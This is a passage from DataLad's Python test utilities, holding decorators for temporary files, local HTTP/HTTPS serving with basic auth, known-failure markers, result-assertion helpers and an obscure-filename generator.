f.read()\n\n if isinstance(content, str):\n file_content = ensure_unicode(file_content)\n\n if os.linesep != '\\n':\n # for consistent comparisons etc. Apparently when reading in `b` mode\n # on Windows we would also get \\r\n # https://github.com/datalad/datalad/pull/3049#issuecomment-444128715\n file_content = file_content.replace(os.linesep, '\\n')\n\n if strip:\n file_content = file_content.strip()\n\n if re_:\n assert_re_in(content, file_content, **kwargs)\n else:\n assert_equal(content, file_content, **kwargs)\n\n\n#\n# Decorators\n#\n\n\n@optional_args\ndef with_tree(t, tree=None, archives_leading_dir=True, delete=True, **tkwargs):\n\n @wraps(t)\n def _wrap_with_tree(*arg, **kw):\n if 'dir' not in tkwargs.keys():\n # if not specified otherwise, respect datalad.tests.temp.dir config\n # as this is a test helper\n tkwargs['dir'] = dl_cfg.get(\"datalad.tests.temp.dir\")\n tkwargs_ = get_tempfile_kwargs(tkwargs, prefix=\"tree\", wrapped=t)\n d = tempfile.mkdtemp(**tkwargs_)\n create_tree(d, tree, archives_leading_dir=archives_leading_dir)\n try:\n return t(*(arg + (d,)), **kw)\n finally:\n if delete:\n rmtemp(d)\n return _wrap_with_tree\n\n\nlgr = logging.getLogger('datalad.tests')\n\n\nclass SilentHTTPHandler(SimpleHTTPRequestHandler):\n \"\"\"A little adapter to silence the handler\n \"\"\"\n def __init__(self, *args, **kwargs):\n self._silent = lgr.getEffectiveLevel() > logging.DEBUG\n SimpleHTTPRequestHandler.__init__(self, *args, **kwargs)\n\n def log_message(self, format, *args):\n if self._silent:\n return\n lgr.debug(\"HTTP: \" + format, *args)\n\n\ndef _multiproc_serve_path_via_http(\n hostname, path_to_serve_from, queue, use_ssl=False, auth=None): # pragma: no cover\n handler = SilentHTTPHandler\n if auth:\n # to-be-expected key for basic auth\n auth_test = (b'Basic ' + base64.b64encode(\n bytes('%s:%s' % auth, 'utf-8'))).decode('utf-8')\n\n # ad-hoc basic-auth handler\n class BasicAuthHandler(SilentHTTPHandler):\n def do_HEAD(self, authenticated):\n if authenticated:\n self.send_response(200)\n else:\n self.send_response(401)\n self.send_header(\n 'WWW-Authenticate', 'Basic realm=\\\"Protected\\\"')\n self.send_header('content-type', 'text/html')\n self.end_headers()\n\n def do_GET(self):\n if self.headers.get('Authorization') == auth_test:\n super().do_GET()\n else:\n self.do_HEAD(False)\n self.wfile.write(bytes('Auth failed', 'utf-8'))\n handler = BasicAuthHandler\n\n chpwd(path_to_serve_from)\n httpd = HTTPServer((hostname, 0), handler)\n if use_ssl:\n ca_dir = Path(__file__).parent / 'ca'\n ssl_key = ca_dir / 'certificate-key.pem'\n ssl_cert = ca_dir / 'certificate-pub.pem'\n if any(not p.exists for p in (ssl_key, ssl_cert)):\n raise RuntimeError(\n 'SSL requested, but no key/cert file combination can be '\n f'located under {ca_dir}')\n # turn on SSL\n context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)\n context.load_cert_chain(str(ssl_cert), str(ssl_key))\n httpd.socket = context.wrap_socket (\n httpd.socket,\n server_side=True)\n queue.put(httpd.server_port)\n httpd.serve_forever()\n\n\nclass HTTPPath(object):\n \"\"\"Serve the content of a path via an HTTP URL.\n\n This class can be used as a context manager, in which case it returns the\n URL.\n\n Alternatively, the `start` and `stop` methods can be called directly.\n\n Parameters\n ----------\n path : str\n Directory with content to serve.\n use_ssl : bool\n auth : tuple\n Username, password\n \"\"\"\n def __init__(self, path, use_ssl=False, auth=None):\n self.path = path\n self.url = None\n self._env_patch = None\n self._mproc = None\n self.use_ssl = use_ssl\n self.auth = auth\n\n def __enter__(self):\n self.start()\n return self.url\n\n def __exit__(self, *args):\n self.stop()\n\n def start(self):\n \"\"\"Start serving `path` via HTTP.\n \"\"\"\n # There is a problem with Haskell on wheezy trying to\n # fetch via IPv6 whenever there is a ::1 localhost entry in\n # /etc/hosts. Apparently fixing that docker image reliably\n # is not that straightforward, although see\n # http://jasonincode.com/customizing-hosts-file-in-docker/\n # so we just force to use 127.0.0.1 while on wheezy\n #hostname = '127.0.0.1' if on_debian_wheezy else 'localhost'\n if self.use_ssl:\n # we cannot use IPs with SSL certificates\n hostname = 'localhost'\n else:\n hostname = '127.0.0.1'\n\n queue = multiprocessing.Queue()\n self._mproc = multiprocessing.Process(\n target=_multiproc_serve_path_via_http,\n args=(hostname, self.path, queue),\n kwargs=dict(use_ssl=self.use_ssl, auth=self.auth))\n self._mproc.start()\n try:\n port = queue.get(timeout=300)\n except multiprocessing.queues.Empty as e:\n if self.use_ssl:\n pytest.skip('No working SSL support')\n else:\n raise\n self.url = 'http{}://{}:{}/'.format(\n 's' if self.use_ssl else '',\n hostname,\n port)\n lgr.debug(\"HTTP: serving %s under %s\", self.path, self.url)\n\n # Such tests don't require real network so if http_proxy settings were\n # provided, we remove them from the env for the duration of this run\n env = os.environ.copy()\n if self.use_ssl:\n env.pop('https_proxy', None)\n env['REQUESTS_CA_BUNDLE'] = str(\n Path(__file__).parent / 'ca' / 'ca_bundle.pem')\n else:\n env.pop('http_proxy', None)\n self._env_patch = patch.dict('os.environ', env, clear=True)\n self._env_patch.start()\n if self.use_ssl:\n # verify that the SSL/cert setup is functional, if not skip the\n # test\n # python-requests does its own thing re root CA trust\n # if this fails, check datalad/tests/ca/prov.sh for ca_bundle\n try:\n import requests\n from requests.auth import HTTPBasicAuth\n r = requests.get(\n self.url,\n verify=True,\n auth=HTTPBasicAuth(*self.auth) if self.auth else None)\n r.raise_for_status()\n # be robust and skip if anything goes wrong, rather than just a\n # particular SSL issue\n #except requests.exceptions.SSLError as e:\n except Exception as e:\n self.stop()\n pytest.skip('No working HTTPS setup')\n # now verify that the stdlib tooling also works\n # if this fails, check datalad/tests/ca/prov.sh\n # for info on deploying a datalad-root.crt\n from urllib.request import (\n Request,\n urlopen,\n )\n try:\n req = Request(self.url)\n if self.auth:\n req.add_header(\n \"Authorization\",\n b\"Basic \" + base64.standard_b64encode(\n '{0}:{1}'.format(*self.auth).encode('utf-8')))\n urlopen(req)\n # be robust and skip if anything goes wrong, rather than just a\n # particular SSL issue\n #except URLError as e:\n except Exception as e:\n self.stop()\n pytest.skip('No working HTTPS setup')\n\n def stop(self):\n \"\"\"Stop serving `path`.\n \"\"\"\n lgr.debug(\"HTTP: stopping server under %s\", self.path)\n self._env_patch.stop()\n self._mproc.terminate()\n\n\n@optional_args\ndef serve_path_via_http(tfunc, *targs, use_ssl=False, auth=None):\n \"\"\"Decorator which serves content of a directory via http url\n\n Parameters\n ----------\n path : str\n Directory with content to serve.\n use_ssl : bool\n Flag whether to set up SSL encryption and return a HTTPS\n URL. This require a valid certificate setup (which is tested\n for proper function) or it will cause a SkipTest to be raised.\n auth : tuple or None\n If a (username, password) tuple is given, the server access will\n be protected via HTTP basic auth.\n \"\"\"\n @wraps(tfunc)\n @attr('serve_path_via_http')\n def _wrap_serve_path_via_http(*args, **kwargs):\n\n if targs:\n # if a path is passed into serve_path_via_http, then it's in targs\n assert len(targs) == 1\n path = targs[0]\n\n elif len(args) > 1:\n args, path = args[:-1], args[-1]\n else:\n args, path = (), args[0]\n\n with HTTPPath(path, use_ssl=use_ssl, auth=auth) as url:\n return tfunc(*(args + (path, url)), **kwargs)\n return _wrap_serve_path_via_http\n\n\n@optional_args\ndef with_memory_keyring(t):\n \"\"\"Decorator to use non-persistent MemoryKeyring instance\n \"\"\"\n @wraps(t)\n @attr('with_memory_keyring')\n def _wrap_with_memory_keyring(*args, **kwargs):\n keyring = MemoryKeyring()\n with patch(\"datalad.downloaders.credentials.keyring_\", keyring):\n return t(*(args + (keyring,)), **kwargs)\n\n return _wrap_with_memory_keyring\n\n\n@optional_args\ndef without_http_proxy(tfunc):\n \"\"\"Decorator to remove http*_proxy env variables for the duration of the test\n \"\"\"\n\n @wraps(tfunc)\n @attr('without_http_proxy')\n def _wrap_without_http_proxy(*args, **kwargs):\n if on_windows:\n pytest.skip('Unclear why this is not working on windows')\n # Such tests don't require real network so if http_proxy settings were\n # provided, we remove them from the env for the duration of this run\n env = os.environ.copy()\n env.pop('http_proxy', None)\n env.pop('https_proxy', None)\n with patch.dict('os.environ', env, clear=True):\n return tfunc(*args, **kwargs)\n\n return _wrap_without_http_proxy\n\n\n@borrowkwargs(methodname=make_tempfile)\n@optional_args\ndef with_tempfile(t, **tkwargs):\n \"\"\"Decorator function to provide a temporary file name and remove it at the end\n\n Parameters\n ----------\n\n To change the used directory without providing keyword argument 'dir' set\n DATALAD_TESTS_TEMP_DIR.\n\n Examples\n --------\n\n ::\n\n @with_tempfile\n def test_write(tfile=None):\n open(tfile, 'w').write('silly test')\n \"\"\"\n\n @wraps(t)\n def _wrap_with_tempfile(*arg, **kw):\n if 'dir' not in tkwargs.keys():\n # if not specified otherwise, respect datalad.tests.temp.dir config\n # as this is a test helper\n tkwargs['dir'] = dl_cfg.get(\"datalad.tests.temp.dir\")\n with make_tempfile(wrapped=t, **tkwargs) as filename:\n return t(*(arg + (filename,)), **kw)\n\n return _wrap_with_tempfile\n\n\n# ### ###\n# START known failure decorators\n# ### ###\n\ndef probe_known_failure(func):\n \"\"\"Test decorator allowing the test to pass when it fails and vice versa\n\n Setting config datalad.tests.knownfailures.probe to True tests, whether or\n not the test is still failing. If it's not, an AssertionError is raised in\n order to indicate that the reason for failure seems to be gone.\n \"\"\"\n\n @wraps(func)\n @attr('probe_known_failure')\n def _wrap_probe_known_failure(*args, **kwargs):\n if dl_cfg.obtain(\"datalad.tests.knownfailures.probe\"):\n assert_raises(Exception, func, *args, **kwargs) # marked as known failure\n # Note: Since assert_raises lacks a `msg` argument, a comment\n # in the same line is helpful to determine what's going on whenever\n # this assertion fails and we see a trace back. Otherwise that line\n # wouldn't be very telling.\n else:\n return func(*args, **kwargs)\n return _wrap_probe_known_failure\n\n\n@optional_args\ndef skip_known_failure(func, method='raise'):\n \"\"\"Test decorator allowing to skip a test that is known to fail\n\n Setting config datalad.tests.knownfailures.skip to a bool enables/disables\n skipping.\n \"\"\"\n\n @skip_if(cond=dl_cfg.obtain(\"datalad.tests.knownfailures.skip\"),\n msg=\"Skip test known to fail\",\n method=method)\n @wraps(func)\n @attr('skip_known_failure')\n def _wrap_skip_known_failure(*args, **kwargs):\n return func(*args, **kwargs)\n return _wrap_skip_known_failure\n\n\ndef known_failure(func):\n \"\"\"Test decorator marking a test as known to fail\n\n This combines `probe_known_failure` and `skip_known_failure` giving the\n skipping precedence over the probing.\n \"\"\"\n\n @skip_known_failure\n @probe_known_failure\n @wraps(func)\n @attr('known_failure')\n def _wrap_known_failure(*args, **kwargs):\n return func(*args, **kwargs)\n return _wrap_known_failure\n\n\ndef known_failure_direct_mode(func):\n \"\"\"DEPRECATED. Stop using. Does nothing\n\n Test decorator marking a test as known to fail in a direct mode test run\n\n If datalad.repo.direct is set to True behaves like `known_failure`.\n Otherwise the original (undecorated) function is returned.\n \"\"\"\n # TODO: consider adopting nibabel/deprecated.py nibabel/deprecator.py\n # mechanism to consistently deprecate functionality and ensure they are\n # displayed.\n # Since 2.7 Deprecation warnings aren't displayed by default\n # and thus kinda pointless to issue a warning here, so we will just log\n msg = \"Direct mode support is deprecated, so no point in using \" \\\n \"@known_failure_direct_mode for %r since glorious future \" \\\n \"DataLad 0.12\" % func.__name__\n lgr.warning(msg)\n return func\n\n\ndef known_failure_windows(func):\n \"\"\"Test decorator marking a test as known to fail on windows\n\n On Windows behaves like `known_failure`.\n Otherwise the original (undecorated) function is returned.\n \"\"\"\n if on_windows:\n\n @known_failure\n @wraps(func)\n @attr('known_failure_windows')\n @attr('windows')\n def dm_func(*args, **kwargs):\n return func(*args, **kwargs)\n\n return dm_func\n return func\n\n\ndef known_failure_githubci_win(func):\n \"\"\"Test decorator for a known test failure on Github's Windows CI\n \"\"\"\n if 'GITHUB_WORKFLOW' in os.environ and on_windows:\n @known_failure\n @wraps(func)\n @attr('known_failure_githubci_win')\n @attr('githubci_win')\n def dm_func(*args, **kwargs):\n return func(*args, **kwargs)\n return dm_func\n return func\n\n\ndef known_failure_githubci_osx(func):\n \"\"\"Test decorator for a known test failure on Github's macOS CI\n \"\"\"\n if 'GITHUB_WORKFLOW' in os.environ and on_osx:\n @known_failure\n @wraps(func)\n @attr('known_failure_githubci_osx')\n @attr('githubci_osx')\n def dm_func(*args, **kwargs):\n return func(*args, **kwargs)\n return dm_func\n return func\n\n\ndef known_failure_osx(func):\n \"\"\"Test decorator for a known test failure on macOS\n \"\"\"\n if on_osx:\n @known_failure\n @wraps(func)\n @attr('known_failure_osx')\n @attr('osx')\n def dm_func(*args, **kwargs):\n return func(*args, **kwargs)\n return dm_func\n return func\n\n\n# ### ###\n# xfails - like known failures but never to be checked to pass etc.\n# e.g. for specific versions of core tools with regressions\n# ### ###\n\n\nxfail_buggy_annex_info = pytest.mark.xfail(\n # 10.20230127 is lower bound since bug was introduced before next 10.20230214\n # release, and thus snapshot builds would fail. There were no release on\n # '10.20230221' - but that is the next day after the fix\n external_versions['cmd:annex'] and ('10.20230127' <= external_versions['cmd:annex'] < '10.20230221'),\n reason=\"Regression in git-annex info. https://github.com/datalad/datalad/issues/7286\"\n)\n\n\ndef _get_resolved_flavors(flavors):\n #flavors_ = (['local', 'clone'] + (['local-url'] if not on_windows else [])) \\\n # if flavors == 'auto' else flavors\n flavors_ = (['local', 'clone', 'local-url', 'network'] if not on_windows\n else ['network', 'network-clone']) \\\n if flavors == 'auto' else flavors\n\n if not isinstance(flavors_, list):\n flavors_ = [flavors_]\n\n if dl_cfg.get('datalad.tests.nonetwork'):\n flavors_ = [x for x in flavors_ if not x.startswith('network')]\n return flavors_\n\nlocal_testrepo_flavors = ['local'] # 'local-url'\n_TESTREPOS = None\n\n@optional_args\ndef with_sameas_remote(func, autoenabled=False):\n \"\"\"Provide a repository with a git-annex sameas remote configured.\n\n The repository will have two special remotes: r_dir (type=directory) and\n r_rsync (type=rsync). The rsync remote will be configured with\n --sameas=r_dir, and autoenabled if `autoenabled` is true.\n \"\"\"\n from datalad.support.annexrepo import AnnexRepo\n from datalad.support.exceptions import CommandError\n\n @wraps(func)\n @attr('with_sameas_remotes')\n @skip_if_on_windows\n @skip_ssh\n @with_tempfile(mkdir=True)\n @with_tempfile(mkdir=True)\n def _wrap_with_sameas_remote(*args, **kwargs):\n # With git-annex's 8.20200522-77-g1f2e2d15e, transferring from an rsync\n # special remote hangs on Xenial. This is likely due to an interaction\n # with an older rsync or openssh version. Use openssh as a rough\n # indicator. See\n # https://git-annex.branchable.com/bugs/Recent_hang_with_rsync_remote_with_older_systems___40__Xenial__44___Jessie__41__/\n if external_versions['cmd:system-ssh'] < '7.4' and \\\n '8.20200522' < external_versions['cmd:annex'] < '8.20200720':\n pytest.skip(\"Test known to hang\")\n\n # A fix in rsync 3.2.4 broke compatibility with older annex versions.\n # To make things a bit more complicated, ubuntu pulled that fix into\n # their rsync package for 3.1.3-8.\n # Issue: gh-7320\n rsync_ver = get_rsync_version()\n rsync_fixed = rsync_ver >= \"3.1.3-8ubuntu\" or rsync_ver >= \"3.2.4\"\n if rsync_fixed and external_versions['cmd:annex'] < \"10.20220504\":\n pytest.skip(f\"rsync {rsync_ver} and git-annex \"\n f\"{external_versions['cmd:annex']} incompatible\")\n\n sr_path, repo_path = args[-2:]\n fn_args = args[:-2]\n repo = AnnexRepo(repo_path)\n repo.init_remote(\"r_dir\",\n options=[\"type=directory\",\n \"encryption=none\",\n \"directory=\" + sr_path])\n options = [\"type=rsync\",\n \"rsyncurl=datalad-test:\" + sr_path]\n if autoenabled:\n options.append(\"autoenable=true\")\n options.append(\"--sameas=r_dir\")\n repo.init_remote(\"r_rsync\", options=options)\n return func(*(fn_args + (repo,)), **kwargs)\n return _wrap_with_sameas_remote\n\n\n@optional_args\ndef with_fake_cookies_db(func, cookies={}):\n \"\"\"mock original cookies db with a fake one for the duration of the test\n \"\"\"\n from ..support.cookies import cookies_db\n\n @wraps(func)\n @attr('with_fake_cookies_db')\n def _wrap_with_fake_cookies_db(*args, **kwargs):\n try:\n orig_cookies_db = cookies_db._cookies_db\n cookies_db._cookies_db = cookies.copy()\n return func(*args, **kwargs)\n finally:\n cookies_db._cookies_db = orig_cookies_db\n return _wrap_with_fake_cookies_db\n\n\n@optional_args\ndef assert_cwd_unchanged(func, ok_to_chdir=False):\n \"\"\"Decorator to test whether the current working directory remains unchanged\n\n Parameters\n ----------\n ok_to_chdir: bool, optional\n If True, allow to chdir, so this decorator would not then raise exception\n if chdir'ed but only return to original directory\n \"\"\"\n\n @wraps(func)\n def _wrap_assert_cwd_unchanged(*args, **kwargs):\n cwd_before = os.getcwd()\n pwd_before = getpwd()\n exc_info = None\n # record previous state of PWD handling\n utils_pwd_mode = utils._pwd_mode\n try:\n ret = func(*args, **kwargs)\n except:\n exc_info = sys.exc_info()\n finally:\n utils._pwd_mode = utils_pwd_mode\n try:\n cwd_after = os.getcwd()\n except OSError as e:\n lgr.warning(\"Failed to getcwd: %s\" % e)\n cwd_after = None\n\n if cwd_after != cwd_before:\n chpwd(pwd_before)\n # Above chpwd could also trigger the change of _pwd_mode, so we\n # would need to reset it again since we know that it is all kosher\n utils._pwd_mode = utils_pwd_mode\n if not ok_to_chdir:\n lgr.warning(\n \"%s changed cwd to %s. Mitigating and changing back to %s\"\n % (func, cwd_after, pwd_before))\n # If there was already exception raised, we better reraise\n # that one since it must be more important, so not masking it\n # here with our assertion\n if exc_info is None:\n assert_equal(cwd_before, cwd_after,\n \"CWD changed from %s to %s\" % (cwd_before, cwd_after))\n\n if exc_info is not None:\n raise exc_info[1]\n\n return ret\n\n return _wrap_assert_cwd_unchanged\n\n\n@optional_args\ndef run_under_dir(func, newdir='.'):\n \"\"\"Decorator to run tests under another directory\n\n It is somewhat ugly since we can't really chdir\n back to a directory which had a symlink in its path.\n So using this decorator has potential to move entire\n testing run under the dereferenced directory name -- sideeffect.\n\n The only way would be to instruct testing framework (i.e. nose\n in our case ATM) to run a test by creating a new process with\n a new cwd\n \"\"\"\n\n @wraps(func)\n def _wrap_run_under_dir(*args, **kwargs):\n pwd_before = getpwd()\n try:\n chpwd(newdir)\n func(*args, **kwargs)\n finally:\n chpwd(pwd_before)\n\n\n return _wrap_run_under_dir\n\n\ndef assert_re_in(regex, c, flags=0, match=True, msg=None):\n \"\"\"Assert that container (list, str, etc) contains entry matching the regex\n \"\"\"\n if not isinstance(c, (list, tuple)):\n c = [c]\n for e in c:\n if (re.match if match else re.search)(regex, e, flags=flags):\n return\n raise AssertionError(\n msg or \"Not a single entry matched %r in %r\" % (regex, c)\n )\n\n\ndef assert_dict_equal(d1, d2):\n msgs = []\n if set(d1).difference(d2):\n msgs.append(\" keys in the first dict but not in the second: %s\"\n % list(set(d1).difference(d2)))\n if set(d2).difference(d1):\n msgs.append(\" keys in the second dict but not in the first: %s\"\n % list(set(d2).difference(d1)))\n for k in set(d1).intersection(d2):\n same = True\n try:\n if isinstance(d1[k], str):\n # do not compare types for string types to avoid all the hassle\n # with the distinction of str and unicode in PY3, and simple\n # test for equality\n same = bool(d1[k] == d2[k])\n else:\n same = type(d1[k]) == type(d2[k]) and bool(d1[k] == d2[k])\n except: # if comparison or conversion to bool (e.g. with numpy arrays) fails\n same = False\n\n if not same:\n msgs.append(\" [%r] differs: %r != %r\" % (k, d1[k], d2[k]))\n\n if len(msgs) > 10:\n msgs.append(\"and more\")\n break\n if msgs:\n raise AssertionError(\"dicts differ:\\n%s\" % \"\\n\".join(msgs))\n # do generic comparison just in case we screwed up to detect difference correctly above\n eq_(d1, d2)\n\n\ndef assert_str_equal(s1, s2):\n \"\"\"Helper to compare two lines\"\"\"\n diff = list(unified_diff(s1.splitlines(), s2.splitlines()))\n assert not diff, '\\n'.join(diff)\n assert_equal(s1, s2)\n\n\ndef assert_status(label, results):\n \"\"\"Verify that each status dict in the results has a given status label\n\n `label` can be a sequence, in which case status must be one of the items\n in this sequence.\n \"\"\"\n label = ensure_list(label)\n results = ensure_result_list(results)\n if len(results) == 0:\n # If there are no results, an assertion about all results must fail.\n raise AssertionError(\"No results retrieved\")\n for i, r in enumerate(results):\n try:\n assert_in('status', r)\n assert_in(r['status'], label)\n except AssertionError:\n raise AssertionError('Test {}/{}: expected status {} not found in:\\n{}'.format(\n i + 1,\n len(results),\n label,\n dumps(results, indent=1, default=lambda x: str(x))))\n\n\ndef assert_message(message, results):\n \"\"\"Verify that each status dict in the results has a message\n\n This only tests the message template string, and not a formatted message\n with args expanded.\n \"\"\"\n\n results = ensure_result_list(results)\n if len(results) == 0:\n # If there are no results, an assertion about all results must fail.\n raise AssertionError(\"No results retrieved\")\n\n for r in results:\n assert_in('message', r)\n m = r['message'][0] if isinstance(r['message'], tuple) else r['message']\n assert_equal(m, message)\n\n\ndef _format_res(x):\n return textwrap.indent(\n dumps(x, indent=1, default=str, sort_keys=True),\n prefix=\" \")\n\n\ndef assert_result_count(results, n, **kwargs):\n \"\"\"Verify specific number of results (matching criteria, if any)\"\"\"\n count = 0\n results = ensure_result_list(results)\n for r in results:\n if not len(kwargs):\n count += 1\n elif all(k in r and r[k] == v for k, v in kwargs.items()):\n count += 1\n if not n == count:\n raise AssertionError(\n 'Got {} instead of {} expected results matching\\n{}\\nInspected {} record(s):\\n{}'.format(\n count,\n n,\n _format_res(kwargs),\n len(results),\n _format_res(results)))\n\n\ndef _check_results_in(should_contain, results, **kwargs):\n results = ensure_result_list(results)\n found = False\n for r in results:\n if all(k in r and r[k] == v for k, v in kwargs.items()):\n found = True\n break\n if found ^ should_contain:\n if should_contain:\n msg = \"Desired result\\n{}\\nnot found among\\n{}\"\n else:\n msg = \"Result\\n{}\\nunexpectedly found among\\n{}\"\n raise AssertionError(msg.format(_format_res(kwargs),\n _format_res(results)))\n\n\ndef assert_in_results(results, **kwargs):\n \"\"\"Verify that the particular combination of keys and values is found in\n one of the results\"\"\"\n _check_results_in(True, results, **kwargs)\n\n\ndef assert_not_in_results(results, **kwargs):\n \"\"\"Verify that the particular combination of keys and values is not in any\n of the results\"\"\"\n _check_results_in(False, results, **kwargs)\n\n\ndef assert_result_values_equal(results, prop, values):\n \"\"\"Verify that the values of all results for a given key in the status dicts\n match the given sequence\"\"\"\n results = ensure_result_list(results)\n assert_equal(\n [r[prop] for r in results],\n values)\n\n\ndef assert_result_values_cond(results, prop, cond):\n \"\"\"Verify that the values of all results for a given key in the status dicts\n fulfill condition `cond`.\n\n Parameters\n ----------\n results:\n prop: str\n cond: callable\n \"\"\"\n results = ensure_result_list(results)\n for r in results:\n ok_(cond(r[prop]),\n msg=\"r[{prop}]: {value}\".format(prop=prop, value=r[prop]))\n\n\ndef ignore_nose_capturing_stdout(func):\n \"\"\"DEPRECATED and will be removed soon. Does nothing!\n\n Originally was intended as a decorator workaround for nose's behaviour\n with redirecting sys.stdout, but now we monkey patch nose now so no test\n should no longer be skipped.\n\n See issue reported here:\n https://code.google.com/p/python-nose/issues/detail?id=243&can=1&sort=-id&colspec=ID%20Type%20Status%20Priority%20Stars%20Milestone%20Owner%20Summary\n\n \"\"\"\n lgr.warning(\n \"@ignore_nose_capturing_stdout no longer does anything - nose should \"\n \"just be monkey patched in setup_package. %s still has it\",\n func.__name__\n )\n return func\n\n\n# Helper to run parametric test with possible combinations of batch and direct\nwith_parametric_batch = pytest.mark.parametrize(\"batch\", [False, True])\n\n\n# List of most obscure filenames which might or not be supported by different\n# filesystems across different OSs. Start with the most obscure\nOBSCURE_PREFIX = os.getenv('DATALAD_TESTS_OBSCURE_PREFIX', '')\n# Those will be tried to be added to the base name if filesystem allows\nOBSCURE_FILENAME_PARTS = [' ', '/', '|', ';', '&', '%b5', '{}', \"'\", '\"', '<', '>']\nUNICODE_FILENAME = u\"ΔЙקم๗あ\"\n\n# OSX is exciting -- some I guess FS might be encoding differently from decoding\n# so Й might get recoded\n# (ref: https://github.com/datalad/datalad/pull/1921#issuecomment-385809366)\nif sys.getfilesystemencoding().lower() == 'utf-8':\n if on_osx:\n # TODO: figure it really out\n UNICODE_FILENAME = UNICODE_FILENAME.replace(u\"Й\", u\"\")\n if on_windows:\n # TODO: really figure out unicode handling on windows\n UNICODE_FILENAME = ''\n if UNICODE_FILENAME:\n OBSCURE_FILENAME_PARTS.append(UNICODE_FILENAME)\n# space before extension, simple extension and trailing space to finish it up\nOBSCURE_FILENAME_PARTS += [' ', '.datc', ' ']\n\n\n@with_tempfile(mkdir=True)\ndef get_most_obscure_supported_name(tdir, return_candidates=False):\n \"\"\"Return the most obscure filename that the filesystem would support under TEMPDIR\n\n Parameters\n ----------\n return_candidates: bool, optional\n if True, return a tuple of (good, candidates) where candidates are \"partially\"\n sorted from trickiest considered\n TODO: we might want to use it as a function where we would provide tdir\n \"\"\"\n # we need separate good_base so we do not breed leading/trailing spaces\n initial = good = OBSCURE_PREFIX\n system = platform.system()\n\n OBSCURE_FILENAMES = []\n def good_filename(filename):\n OBSCURE_FILENAMES.append(candidate)\n try:\n # Windows seems to not tollerate trailing spaces and\n # ATM we do not distinguish obscure filename and dirname.\n # So here we will test for both - being able to create dir\n # with obscure name and obscure filename under\n os.mkdir(opj(tdir, filename))\n with open(opj(tdir, filename, filename), 'w') as f:\n f.write(\"TEST LOAD\")\n return True\n except:\n lgr.debug(\"Filename %r is not supported on %s under %s\",\n filename, system, tdir)\n return False\n\n # incrementally build up the most obscure filename from parts\n for part in OBSCURE_FILENAME_PARTS:\n candidate = good + part\n if good_filename(candidate):\n good = candidate\n\n if good == initial:\n raise RuntimeError(\"Could not create any of the files under %s among %s\"\n % (tdir, OBSCURE_FILENAMES))\n lgr.debug(\"Tested %d obscure filename candidates. The winner: %r\", len(OBSCURE_FILENAMES), good)\n if return_candidates:\n return good, OBSCURE_FILENAMES[::-1]\n else:\n return good\n\n\nOBSCURE_FILENAME, OBSCURE_FILENAMES = get_most_obscure_supported_name(return_candidates=True)\n\n\n@optional_args\ndef with_testsui(t, responses=None, interactive=True):\n \"\"\"Switch main UI to be 'tests' UI and possibly provide answers to be used\"\"\"\n\n @wraps(t)\n def _wrap_with_testsui(*args, **kwargs):\n from datalad.ui import ui\n old_backend = ui.backend\n try:\n ui.set_backend('tests' if interactive else 'tests-noninteractive')\n if responses:\n ui.add_responses(responses)\n ret = t(*args, **kwargs)\n if responses:\n responses_left = ui.get_responses()\n assert not len(responses_left), \"Some responses were left not used: %s\" % str(responses_left)\n return ret\n finally:\n ui.set_backend(old_backend)\n\n if not interactive and responses is not None:\n raise ValueError(\"Non-interactive UI cannot provide responses\")\n\n return _wrap_with_testsui\n\nwith_testsui.__test__ = False\n\n\ndef assert_no_errors_logged(func, skip_re=None):\n \"\"\"Decorator around function to assert that no errors logged during its execution\"\"\"\n @wraps(func)\n def _wrap_assert_no_errors_logged(*args, **kwargs):\n with swallow_logs(new_level=logging.ERROR) as cml:\n out = func(*args, **kwargs)\n if cml.out:\n if not (skip_re and re.search(skip_re, cml.out)):\n raise AssertionError(\n \"Expected no errors to be logged, but log output is %s\"\n % cml.out\n )\n return out\n\n return _wrap_assert_no_errors_logged\n\n\ndef get_mtimes_and_digests(target_path):\n \"\"\"Return digests (md5) and mtimes for all the files under target_path\"\"\"\n from datalad.support.digests import Digester\n from datalad.utils import find_files\n digester = Digester(['md5'])\n\n # bother only with existing ones for this test, i.e. skip annexed files without content\n target_files = [\n f for f in find_files('.*', topdir=target_path, exclude_vcs=False, exclude_datalad=False)\n if exists(f)\n ]\n # let's leave only relative paths for easier analysis\n target_files_ = [relpath(f, target_path) for f in target_files]\n\n digests = {frel: digester(f) for f, frel in zip(target_files, target_files_)}\n mtimes = {frel: os.stat(f).st_mtime for f, frel in zip(target_files, target_files_)}\n return digests, mtimes\n\n\ndef get_datasets_topdir():\n \"\"\"Delayed parsing so it could be monkey patched etc\"\"\"\n from datalad.consts import DATASETS_TOPURL\n return RI(DATASETS_TOPURL).hostname\n\n\ndef assert_repo_status(path, annex=None, untracked_mode='normal', **kwargs):\n \"\"\"Compare a repo status against (optional) exceptions.\n\n Anything file/directory that is not explicitly indicated must have\n state 'clean', i.e. no modifications and recorded in Git.\n\n Parameters\n ----------\n path: str or Repo\n in case of a str: path to the repository's base dir;\n Note, that passing a Repo instance prevents detecting annex. This might\n be useful in case of a non-initialized annex, a GitRepo is pointing to.\n annex: bool or None\n explicitly set to True or False to indicate, that an annex is (not)\n expected; set to None to autodetect, whether there is an annex.\n Default: None.\n untracked_mode: {'no', 'normal', 'all'}\n If and how untracked content is reported. The specification of untracked\n files that are OK to be found must match this mode. See `Repo.status()`\n **kwargs\n Files/directories that are OK to not be in 'clean' state. Each argument\n must be one of 'added', 'untracked', 'deleted', 'modified' and each\n value must be a list of filenames (relative to the root of the\n repository, in POSIX convention).\n \"\"\"\n r = None\n if isinstance(path, AnnexRepo):\n if annex is None:\n annex = True\n # if `annex` was set to False, but we find an annex => fail\n assert_is(annex, True)\n r = path\n elif isinstance(path, GitRepo):\n if annex is None:\n annex = False\n # explicitly given GitRepo instance doesn't make sense with\n # 'annex' True\n assert_is(annex, False)\n r = path\n else:\n # 'path' is an actual path\n try:\n r = AnnexRepo(path, init=False, create=False)\n if annex is None:\n annex = True\n # if `annex` was set to False, but we find an annex => fail\n assert_is(annex, True)\n except Exception:\n # Instantiation failed => no annex\n try:\n r = GitRepo(path, init=False, create=False)\n except Exception:\n raise AssertionError(\"Couldn't find an annex or a git \"\n \"repository at {}.\".format(path))\n if annex is None:\n annex = False\n # explicitly given GitRepo instance doesn't make sense with\n # 'annex' True\n assert_is(annex, False)\n\n status = r.status(untracked=untracked_mode)\n # for any file state that indicates some kind of change (all but 'clean)\n for state in ('added', 'untracked', 'deleted', 'modified'):\n oktobefound = sorted(r.pathobj.joinpath(ut.PurePosixPath(p))\n for p in kwargs.get(state, []))\n state_files = sorted(k for k, v in status.items()\n if 